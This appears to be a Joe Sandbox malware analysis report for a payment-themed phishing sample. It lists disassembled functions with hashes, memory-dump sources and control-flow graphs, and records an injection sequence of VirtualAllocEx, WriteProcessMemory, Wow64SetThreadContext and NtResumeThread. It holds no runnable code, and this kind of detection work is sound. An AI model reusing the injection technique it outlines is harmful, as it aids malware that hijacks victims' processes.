                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_5dc0000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: ff50f39be442e31ef09072243dd01bf83b4ce76a7f0d3160a3e462b6a813b8da
                                              • Instruction ID: 6e61bfc793136e47c2b0d75d27784bdf08a4ea9a3063213ce9ec43643c654105
                                              • Opcode Fuzzy Hash: ff50f39be442e31ef09072243dd01bf83b4ce76a7f0d3160a3e462b6a813b8da
                                              • Instruction Fuzzy Hash: D31124B5D003498FDB10DFAAD484B9EFBF4EB48210F50842ED419A7240CB799905CFA5
                                              Function 05DC1398 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 211 5dc1398-5dc1413 NtResumeThread 214 5dc141c-5dc1441 211->214 215 5dc1415-5dc141b 211->215 215->214
                                              APIs
                                              • NtResumeThread.NTDLL(?,?), ref: 05DC1406
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1577009882.0000000005DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_5dc0000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 9fd91f9aa6988060acea76cd6d4df0e8e8ec238f213f88c82d4570a3a507d322
                                              • Instruction ID: c0bcc5b666cf6ad3c74ed2afc8c0d769183a420ff823396ae4b52600c039ae90
                                              • Opcode Fuzzy Hash: 9fd91f9aa6988060acea76cd6d4df0e8e8ec238f213f88c82d4570a3a507d322
                                              • Instruction Fuzzy Hash: 7111F2B5D003498FDB24DFAAC484B9EFBF4AB88214F50842ED419A7240CB79A945CFA5
                                              Function 05C5C880 Relevance: 1.4, Strings: 1, Instructions: 168COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 227 5c5c880-5c5c8b1 229 5c5c8b3 227->229 230 5c5c8b8-5c5c942 227->230 229->230 323 5c5c948 call 5c5d400 230->323 324 5c5c948 call 5c5d3f0 230->324 235 5c5c94e-5c5c99b 238 5c5c99d-5c5c9a8 235->238 239 5c5c9aa 235->239 240 5c5c9b4-5c5cacf 238->240 239->240 251 5c5cae1-5c5cb0c 240->251 252 5c5cad1-5c5cad7 240->252 253 5c5d2d2-5c5d2ee 251->253 252->251 254 5c5d2f4-5c5d30f 253->254 255 5c5cb11-5c5cc74 call 5c5b3e0 253->255 266 5c5cc86-5c5cdd4 call 5c58cf8 call 5c58b38 255->266 267 5c5cc76-5c5cc7c 255->267 278 5c5cdd9-5c5ce15 266->278 267->266 279 5c5ce17-5c5ce1b 278->279 280 5c5ce7a-5c5ce84 278->280 282 5c5ce23-5c5ce75 279->282 283 5c5ce1d-5c5ce1e 279->283 281 5c5d0ab-5c5d0ca 280->281 285 5c5d0d0-5c5d0fa 281->285 286 5c5ce89-5c5cfcf call 5c5b3e0 281->286 284 5c5d150-5c5d1bb 282->284 283->284 303 5c5d1cd-5c5d218 284->303 304 5c5d1bd-5c5d1c3 284->304 292 5c5d14d-5c5d14e 285->292 293 5c5d0fc-5c5d14a 285->293 315 5c5cfd5-5c5d0a1 call 5c5b3e0 286->315 316 5c5d0a4-5c5d0a5 286->316 292->284 293->292 305 5c5d2b7-5c5d2cf 303->305 306 5c5d21e-5c5d2b6 303->306 304->303 305->253 306->305 315->316 316->281 323->235 324->235
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1576594089.0000000005C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_5c50000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: h
                                              • API String ID: 0-2439710439
                                              • Opcode ID: 8a1e5807a2488757e6550c9230c090f5bdf16d4269dd1bbdba0d3223c24c9ca4
                                              • Instruction ID: d29667b9bf8079d490e865d1aa0219027a9d3cd43c8c04de94c6f38fee8a6144
                                              • Opcode Fuzzy Hash: 8a1e5807a2488757e6550c9230c090f5bdf16d4269dd1bbdba0d3223c24c9ca4
                                              • Instruction Fuzzy Hash: 5971F774E00629CFEB64DF69D844BD9B7B2FB89300F1085AAD90DA7254DB349E85CF90
                                              Function 0307D218 Relevance: 1.0, Instructions: 983COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1562941409.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_3070000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ed459408689fa27f538235f460614bf3bfe450060a1e5fe0f5d614d67ad9bfa8
                                              • Instruction ID: f6c47e5aaf5c9832c36c1fc84f8944482d0006adeaf6c6dce9f3fd4daaf89569
                                              • Opcode Fuzzy Hash: ed459408689fa27f538235f460614bf3bfe450060a1e5fe0f5d614d67ad9bfa8
                                              • Instruction Fuzzy Hash: E4A2A375E01228CFDB64DF69C984A99BBB2FF89304F1581E9D509AB325DB319E81CF40
                                              Function 0785E530 Relevance: .3, Instructions: 276COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1580492791.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_7840000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cab43b4d773e7276786ff92f9181a4bd4cf6bc396a5945d349f7d02ebcc05dd0
                                              • Instruction ID: ec509cf549d970c4ed2b6c90f8d220a7cd63bf2027b4bfacf089cf6eeae9158e
                                              • Opcode Fuzzy Hash: cab43b4d773e7276786ff92f9181a4bd4cf6bc396a5945d349f7d02ebcc05dd0
                                              • Instruction Fuzzy Hash: 5BD18074A00219CFDB64DFA9D994A9DBBF2FF89300F1081A9D409AB365DB359D82CF50
                                              Function 05DC0D09 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 134 5dc0d09-5dc0d5e 137 5dc0d6e-5dc0dad WriteProcessMemory 134->137 138 5dc0d60-5dc0d6c 134->138 140 5dc0daf-5dc0db5 137->140 141 5dc0db6-5dc0de6 137->141 138->137 140->141
                                              APIs
                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05DC0DA0
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1577009882.0000000005DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_5dc0000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: d28dcae15f33f3a701524c886e27a6929d02c5ad9cc402ca230a9695d6c49c08
                                              • Instruction ID: 0e3a8ccaea9042faf3c0fa43e3756b9d064118fc67ec56b3e7968f7ce2e00f13
                                              • Opcode Fuzzy Hash: d28dcae15f33f3a701524c886e27a6929d02c5ad9cc402ca230a9695d6c49c08
                                              • Instruction Fuzzy Hash: A72115759003499FDB10DFAAC884BEEBBF5FF48310F10842AE919A7240D779A944CBA4
                                              Function 05DC0D10 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 145 5dc0d10-5dc0d5e 147 5dc0d6e-5dc0dad WriteProcessMemory 145->147 148 5dc0d60-5dc0d6c 145->148 150 5dc0daf-5dc0db5 147->150 151 5dc0db6-5dc0de6 147->151 148->147 150->151
                                              APIs
                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05DC0DA0
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1577009882.0000000005DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_5dc0000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: d33298972c775a08b9bb37ebdccf3b7a0a67d4d9952efc7c8611ba0b52aaaa7e
                                              • Instruction ID: 5c8413f08a8e7023c1bba1e1b9065399ce0c4a9150e27943feac1fde02db70c5
                                              • Opcode Fuzzy Hash: d33298972c775a08b9bb37ebdccf3b7a0a67d4d9952efc7c8611ba0b52aaaa7e
                                              • Instruction Fuzzy Hash: E62126759003499FDB10CFAAC884BDEBBF5FF48310F10842AE919A7240D779A944CBA4
                                              Function 05DC0471 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 164 5dc0471-5dc04c3 167 5dc04c5-5dc04d1 164->167 168 5dc04d3-5dc0503 Wow64SetThreadContext 164->168 167->168 170 5dc050c-5dc053c 168->170 171 5dc0505-5dc050b 168->171 171->170
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05DC04F6
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1577009882.0000000005DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_5dc0000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 0854147c4e807669add5f00c071d853ac10d97db07a0412593ee4299d93af62e
                                              • Instruction ID: cf1dfe9a1e02680f4d7fc3db457c56d98728fe84f69fb4bc5501e08bea8b9f86
                                              • Opcode Fuzzy Hash: 0854147c4e807669add5f00c071d853ac10d97db07a0412593ee4299d93af62e
                                              • Instruction Fuzzy Hash: B5214371D043498FDB10DFAAC484BEFBBF4EB88214F14842ED419A7240DB789A44CFA4
                                              Function 05DC0478 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 183 5dc0478-5dc04c3 185 5dc04c5-5dc04d1 183->185 186 5dc04d3-5dc0503 Wow64SetThreadContext 183->186 185->186 188 5dc050c-5dc053c 186->188 189 5dc0505-5dc050b 186->189 189->188
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05DC04F6
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1577009882.0000000005DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_5dc0000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: ee19ec4a48b5e7728cff4d9e0bdf16e8eec36fcfff130e855d0ccf8208541819
                                              • Instruction ID: fa793a1d336c27db1ad9f30e9dcc513f4ef1039282dec0c36fb25ddadcecf378
                                              • Opcode Fuzzy Hash: ee19ec4a48b5e7728cff4d9e0bdf16e8eec36fcfff130e855d0ccf8208541819
                                              • Instruction Fuzzy Hash: 40213275D043498FDB20DFAAC484BAFBBF4EF88214F54842ED419A7240DB78A944CFA4
                                              Function 05DC0A69 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 202 5dc0a69-5dc0aeb VirtualAllocEx 206 5dc0aed-5dc0af3 202->206 207 5dc0af4-5dc0b19 202->207 206->207
                                              APIs
                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 05DC0ADE
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1577009882.0000000005DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_5dc0000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 7e9bd4413fe290e7d5406b4923c2d4a503821f83a28f4bcfd850cad7e5e6afaa
                                              • Instruction ID: 512bef909b73a214d91ff4a70f5735a5873d793391056e97f298175ef31a1713
                                              • Opcode Fuzzy Hash: 7e9bd4413fe290e7d5406b4923c2d4a503821f83a28f4bcfd850cad7e5e6afaa
                                              • Instruction Fuzzy Hash: 591147768003499FDB10DFAAD844BDFBBF5EB48314F14841AE515A7250CB759944CBA4
                                              Function 05DC0A70 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 219 5dc0a70-5dc0aeb VirtualAllocEx 222 5dc0aed-5dc0af3 219->222 223 5dc0af4-5dc0b19 219->223 222->223
                                              APIs
                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 05DC0ADE
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1577009882.0000000005DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_5dc0000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 0b9d5b824f28ffb4af65952d621432eefb2e6cf1855ca5f7695f25d5d62e68a8
                                              • Instruction ID: ca44ea17d196acc495a1c013cfa05bd3bcd4d6938aaf4bc795d68f290864d4e1
                                              • Opcode Fuzzy Hash: 0b9d5b824f28ffb4af65952d621432eefb2e6cf1855ca5f7695f25d5d62e68a8
                                              • Instruction Fuzzy Hash: 0E1156758003499FDB20DFAAC844BDFBBF5EF88314F10841AE529A7250CB799940CFA4
                                              Function 078405F1 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1580492791.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_7840000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %
                                              • API String ID: 0-2567322570
                                              • Opcode ID: db1e340d1f9b8ba69bc1dbb05b673b3bb3e2cdba002b83d4c8d437b290b64029
                                              • Instruction ID: 1d894b5071fb5c1aa2541c9fe9b37a94d7570c83898aeafd5c2dcda3819fc6f1
                                              • Opcode Fuzzy Hash: db1e340d1f9b8ba69bc1dbb05b673b3bb3e2cdba002b83d4c8d437b290b64029
                                              • Instruction Fuzzy Hash: 43014BB0900229CFEBA0EF14E858BAEB7B1EB45315F1040E8D109A7645DB784EC5CF54
                                              Function 0307E508 Relevance: .4, Instructions: 357COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1562941409.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_3070000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bf47f76d3af79e11cedb9b9ad1160a5c7d0a085e122894d5619e834bd1a60c93
                                              • Instruction ID: c95076fca071b1f3d5bece097cc2da4c0dbb0821499f9289c7aef1f97263a16c
                                              • Opcode Fuzzy Hash: bf47f76d3af79e11cedb9b9ad1160a5c7d0a085e122894d5619e834bd1a60c93
                                              • Instruction Fuzzy Hash: 10C111327012158FDB55EF69E850AAE7BE6FFC5610B1841AAE909CB391CA35DC02C7E1
                                              Function 0307EDD8 Relevance: .2, Instructions: 208COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1562941409.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_3070000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bf1095e569653eaf9140c0283ccff755f4e6d9ff3c1db4816df1035749d84746
                                              • Instruction ID: a4db1181a782b45284f2412270edca2a5d4790834196d9aff537eb741d6a152c
                                              • Opcode Fuzzy Hash: bf1095e569653eaf9140c0283ccff755f4e6d9ff3c1db4816df1035749d84746
                                              • Instruction Fuzzy Hash: A4812735A01619CFCB24DF68C484A9DB7F5FF88350B1685AAE806DB360DB71ED42CB90
                                              Function 03070890 Relevance: .2, Instructions: 178COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1562941409.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_3070000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7186d52c1d562b9eb5f28a15935131a44aeae494f6d1920f1948d0ace880f89a
                                              • Instruction ID: 2ea5dc03ab4b19d0f868f375d6411a74c7a9e460f0f62f4cf9c0c36a79e21db5
                                              • Opcode Fuzzy Hash: 7186d52c1d562b9eb5f28a15935131a44aeae494f6d1920f1948d0ace880f89a
                                              • Instruction Fuzzy Hash: 3A518935B002148FCB14EB69C458A6EBBF6FF88710F158469E506DB3A1DB35EC468B94
                                              Function 03070880 Relevance: .1, Instructions: 97COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1562941409.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_3070000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7bbf60d3d5ba9da56b92adcecf0bfee0be87e327854f6dba2006313068721cbd
                                              • Instruction ID: 3d0f62b69b0cc37cc4ebc8484336265f6666744a68e86bd090b4986e25ea82c5
                                              • Opcode Fuzzy Hash: 7bbf60d3d5ba9da56b92adcecf0bfee0be87e327854f6dba2006313068721cbd
                                              • Instruction Fuzzy Hash: 27315C357002049FD754DB3DC894A2ABBE6FF85314B1985A9E54ACB362DB31EC42CB54
                                              Function 03079220 Relevance: .1, Instructions: 91COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1562941409.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_3070000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e26fefda0fe382266640bba4bbd916fd5b7f0c6b9079b68169f7bf831713912f
                                              • Instruction ID: af42dbc057700556680e387892f36c165dc0ab49e982845b1b5bd7c61da65926
                                              • Opcode Fuzzy Hash: e26fefda0fe382266640bba4bbd916fd5b7f0c6b9079b68169f7bf831713912f
                                              • Instruction Fuzzy Hash: 3C319A70E0A209DFEB80EF9DD0087AEBBF6FB49300F1080A5D104A7655D7788A8ACF51
                                              Function 030712CC Relevance: .1, Instructions: 87COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1562941409.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_3070000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2fef220d8bce267d6bde56f8ae4052bc2067f0a112fd582fc92ff0d5b4e93c24
                                              • Instruction ID: 1d7bcfaa55f0317abe64249a524d835856706407f589ce9fb67e711c7999b4bf
                                              • Opcode Fuzzy Hash: 2fef220d8bce267d6bde56f8ae4052bc2067f0a112fd582fc92ff0d5b4e93c24
                                              • Instruction Fuzzy Hash: 4C312A70D012489FDB24CFAAD984ADEBFF5EF48310F14841AE818AB290DB759945CF94
                                              Function 03079230 Relevance: .1, Instructions: 85COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1562941409.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_3070000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0f4924176e4b676028c4a531a7e32c3b36405bcee62c87dc03a4909ab315a023
                                              • Instruction ID: dec0179fecffe823a7969212e13462e27ea7d34e2c63700615a908f986e62a8d
                                              • Opcode Fuzzy Hash: 0f4924176e4b676028c4a531a7e32c3b36405bcee62c87dc03a4909ab315a023
                                              • Instruction Fuzzy Hash: DB315A70E06209DFEB40EF99D0087AEBBF6FB48300F108465D114A7655D778898ACF45
                                              Function 030712D8 Relevance: .1, Instructions: 83COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1562941409.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_3070000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2cdd9e2508c88b6468a55e19615b7388174da6742867dc756f7e6feb320e17e3
                                              • Instruction ID: c5c0bd8a303f4dfb34eacc1a5a460a1355127cd92351a363b480fcb12620c334
                                              • Opcode Fuzzy Hash: 2cdd9e2508c88b6468a55e19615b7388174da6742867dc756f7e6feb320e17e3
                                              • Instruction Fuzzy Hash: F7311A70D012489FDB24CFAAD580ADEBFF5AF48310F148419E419AB290DB759945CF94
                                              Function 0179D030 Relevance: .1, Instructions: 74COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1562699049.000000000179D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0179D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_179d000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7f73b83087f5450511f527161f28157ac8631eed793bceb16b9db011861349b7
                                              • Instruction ID: f372ffe70b17f2b9c91b1fc2df501f2834fca0a49ee70ff42216974d87e51218
                                              • Opcode Fuzzy Hash: 7f73b83087f5450511f527161f28157ac8631eed793bceb16b9db011861349b7
                                              • Instruction Fuzzy Hash: A021F5B2504244DFDF25DF58E9C4B1AFBA5FB88314F24C5A9D9050B246C33AD85BCBA2
                                              Function 0307920D Relevance: .1, Instructions: 71COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1562941409.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_3070000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4468f65b5e6ce65d98888d61b5a3de3863210901af0e9cc505944d5a83128076
                                              • Instruction ID: 84837c69e5c441f30cffff32f08e1c340e9f098f4e7a4451c12b93c5f2d77adb
                                              • Opcode Fuzzy Hash: 4468f65b5e6ce65d98888d61b5a3de3863210901af0e9cc505944d5a83128076
                                              • Instruction Fuzzy Hash: DE318BB0E0A209DFDB40EF9DD0087AEBBF2FB44300F1480A5C114A7655D7388A8ACF05
                                              Function 0785FE00 Relevance: .1, Instructions: 70COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1580492791.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_7840000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 55fea78390f8caf5de730e04e4798f53c128926b977b9fda76f503d604efcad0
                                              • Instruction ID: 723981582049235f2252d7dc4542343374fac25f81f12bb84f4a0745b2575d3b
                                              • Opcode Fuzzy Hash: 55fea78390f8caf5de730e04e4798f53c128926b977b9fda76f503d604efcad0
                                              • Instruction Fuzzy Hash: 0E215EB0E04209CFCB44CF6DD858AAEBBF1EB59304F008469D515EB395D7789A41CF90
                                              Function 0307E418 Relevance: .1, Instructions: 58COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1562941409.0000000003070000.00000040.00000800.00020000.00000000.sdmp, Offset: 03070000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_3070000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e43b1ca09bd059cc466bc574c4bd80fc370a0f3654cb56dcd04a41a4a5930e78
                                              • Instruction ID: 07c7af15891fe47e7550cc1d1c54713a2692c59bf9e34ea4fcff25890b5fa0fe
                                              • Opcode Fuzzy Hash: e43b1ca09bd059cc466bc574c4bd80fc370a0f3654cb56dcd04a41a4a5930e78
                                              • Instruction Fuzzy Hash: 23113470E06219CFDB04DFA9C4446EEBBFAFB8D310F14846AD508B3240D7345A45CBA5
                                              Function 0179D02B Relevance: .1, Instructions: 55COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1562699049.000000000179D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0179D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_179d000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 079788eaf3aa4a682710bbc0466f5cb9f9dbb53825b8314ac48270263811cb76
                                              • Instruction ID: 573199e4600db9881a3abdb12be0596402221d0100965236317fb64c89697837
                                              • Opcode Fuzzy Hash: 079788eaf3aa4a682710bbc0466f5cb9f9dbb53825b8314ac48270263811cb76
                                              • Instruction Fuzzy Hash: 5611AF76504284CFCB22CF58EAC0B1AFF71FB84310F24C5A9D8090B656C336D45ACBA2
                                              Function 07859ED8 Relevance: .1, Instructions: 51COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1580492791.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_7840000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 623ff2e9aa2d2b2f04d05ea0b19a55358068773ca2ed04ef286aef7eee6120e8
                                              • Instruction ID: 01d3d660308c41eb5d2aafcf384dac7bebc8e425014139dc2f030bd11a7d5376
                                              • Opcode Fuzzy Hash: 623ff2e9aa2d2b2f04d05ea0b19a55358068773ca2ed04ef286aef7eee6120e8
                                              • Instruction Fuzzy Hash: CB2156B4E01209DFCB54DFA8C1446AEBBF1FB49304F208569D819E7354E735AA41CF91
                                              Function 0178D76D Relevance: .0, Instructions: 45COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1562664289.000000000178D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0178D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_178d000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2aeaa14d31bc9c22c1a66f1953ff73c21dc79cbc977766d90d8dac6848ed3ce3
                                              • Instruction ID: 397178896672f0c5828a74daa87087b33b3bb1f04a9890d347543f9aa506be2f
                                              • Opcode Fuzzy Hash: 2aeaa14d31bc9c22c1a66f1953ff73c21dc79cbc977766d90d8dac6848ed3ce3
                                              • Instruction Fuzzy Hash: D601A231548384AEE7307A69DD84B67FBD8DF41324F18C06AED094F2C6C6799841CA72
                                              Function 0178D76C Relevance: .0, Instructions: 36COMMON
                                              Download Yara Rule
